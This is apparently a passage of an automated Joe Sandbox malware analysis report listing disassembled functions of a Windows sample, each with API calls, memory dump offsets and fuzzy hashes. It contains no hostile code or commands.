                                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                                            • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                                            • Opcode ID: 33a6eeb424a59c5021b37bcb26c13c5fca1bb7764044da02c9e52baff78b50a2
                                                                                                                                                                                                                                            • Instruction ID: 6d3ac398ac4c11d49c61d2d6865c5a27b0c21c9c573177bec35ad15ca1f86ff9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33a6eeb424a59c5021b37bcb26c13c5fca1bb7764044da02c9e52baff78b50a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A341C132709B4182EB28AF15D490A6973A0FB44B84F148675DB6E0BBDCDF7EE4A5C740
                                                                                                                                                                                                                                            Function 00007FF633D7C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                            • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                            • Instruction ID: 528c13ac300fcc56f4705cb4b58e9af3934c80681faf2d2725b38b10881988d5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB112322B08A8181DA208F65B801169A361FB81FF0F540331EE7DABBE8CF3CE0148700
                                                                                                                                                                                                                                            Function 00007FF633D7A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                            • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                            • Instruction ID: 961b76213ca98761911f8107df0f137bddfc197f78ccfadd275760d864e1703e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECE08C50F1920282FF096FF2A8571381261AF88B00F840330D81DEA3A2EE2CA892A310
                                                                                                                                                                                                                                            Function 00007FF633D7AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF633D7A9D5,?,?,00000000,00007FF633D7AA8A), ref: 00007FF633D7ABC6
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D7A9D5,?,?,00000000,00007FF633D7AA8A), ref: 00007FF633D7ABD0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                                            • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                            • Instruction ID: bb6fadb88fe661f1c50253329f5dc08f00c8fd4f1c04d8527db8b862d570277d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21E721F2C68241FEA59FE5949737D12829F847A1F084339EA2EE77D2CE6DE4416300
                                                                                                                                                                                                                                            Function 00007FF633D7BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                            • Instruction ID: 2dc2c58e76882c7fe97a43a83f5e256a02c0927397f6123dc5a542c555bc85c4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD41D63291824587EA349FA9A542279B7A0EB55B94F100331E78ED37D1CF3EE443EB51
                                                                                                                                                                                                                                            Function 00007FFDFAEC652A Relevance: 1.6, APIs: 1, Instructions: 350COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                            • Opcode ID: ff43006544f348e3048398159edfdbb45dc07a4a4d076fe4cc9f01bb488bd133
                                                                                                                                                                                                                                            • Instruction ID: 6cee30973ad876b65ab392637d2c869e6a24a0d4b464129539b6c8d1c415d3a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff43006544f348e3048398159edfdbb45dc07a4a4d076fe4cc9f01bb488bd133
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31E432B0824186EB6AAF15956097A33A0EB40F58F055471DE2E477CDDF3EE891C700
                                                                                                                                                                                                                                            Function 00007FF633D67F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                                            • Opcode ID: e1315d2f6f00395e8c4775e010b327fe7281e2fae45ce4cd0a11699a80637139
                                                                                                                                                                                                                                            • Instruction ID: c482a39cc030fcbdb5c74d12cf6a9067f0b0d24bee4a908b9c7825a79cfd48ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1315d2f6f00395e8c4775e010b327fe7281e2fae45ce4cd0a11699a80637139
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21F721B18B5246FF109FA268063BAA651BF45BC4FCC5930EE1DA7786CE7DE051D300
                                                                                                                                                                                                                                            Function 00007FF633D7B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                            • Instruction ID: af70bb7a3c6f31b9e390633d1bb89b6c7acd811030c50bd4684439e7c952e65f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F131C962E1865285F7116FD5884337D2AA0BF80BA4F410335E96DE33D2DFBCE481A711
                                                                                                                                                                                                                                            Function 00007FF633D75F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                            • Instruction ID: 71194e22d05641b10dc65178b92433d9c01259dbd81bc5257bd447ae03344ba5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA118731A2C64281FA619F91940217DE265BF85B84F844635FB8CF7BD6CF3DD441A701
                                                                                                                                                                                                                                            Function 00007FF633D86354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                            • Instruction ID: 681b49116d6078b83f6c01a51bb582aea50fed0a75d1bbc720fa48e5edc4b4eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8121C232A08A4586DB618FA8D44237976A1FB84B64F185334E75DDB7D9DF3CE4019B00
                                                                                                                                                                                                                                            Function 00007FF633D703BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                            • Instruction ID: 8100abf10ddfc778ae3f560dacaff004b234dc34a937c99278895e9b877d69de
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26019621A0874581EA04DFA6A902179A6A5FF85FE4F484731EE6CB7BD6CF3CE401A300
                                                                                                                                                                                                                                            Function 00007FF633D68E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00007FF633D66476,?,00007FF633D6336E), ref: 00007FF633D68EA2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                                                                                                            • Opcode ID: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
                                                                                                                                                                                                                                            • Instruction ID: 578265085706a170f51f15b917ea63c02d5dd7c80fac34327bcf48aebca9e358
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9D0C201F3824542EA44A7B7BA47639A251AFC9BC0F98D035EE5D47B5AEC3CD0914B00
                                                                                                                                                                                                                                            Function 00007FFDFAE81CF8 Relevance: 1.3, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                            • Opcode ID: c6d810e0a92dfab2f57800588eaa3bba5a0c0cbf05fe10e2817728c59d1b6220
                                                                                                                                                                                                                                            • Instruction ID: f809ee69fdaeef3cf295af42917520fde26c64398c0cb3356ed228048a87a669
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6d810e0a92dfab2f57800588eaa3bba5a0c0cbf05fe10e2817728c59d1b6220
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C031AF32B0820286EB6AAF16956097A73A1EB40F54F1694B1DD6E577CDCF3EE881D700
                                                                                                                                                                                                                                            Function 00007FFDFAE97DF0 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                            • Opcode ID: 8e011317cca6565eb200d0702bfa620ad3ccf4c4be6080c5c317d346bd03422b
                                                                                                                                                                                                                                            • Instruction ID: 76269b6929a057e415c7e40db9153c0251acd282ee2f1ee44e2ff160dd646908
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e011317cca6565eb200d0702bfa620ad3ccf4c4be6080c5c317d346bd03422b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16217C32708B8086D758DB26E5906ADB7A0FB88BD4F148135EFAD47B98CF78D595CB00
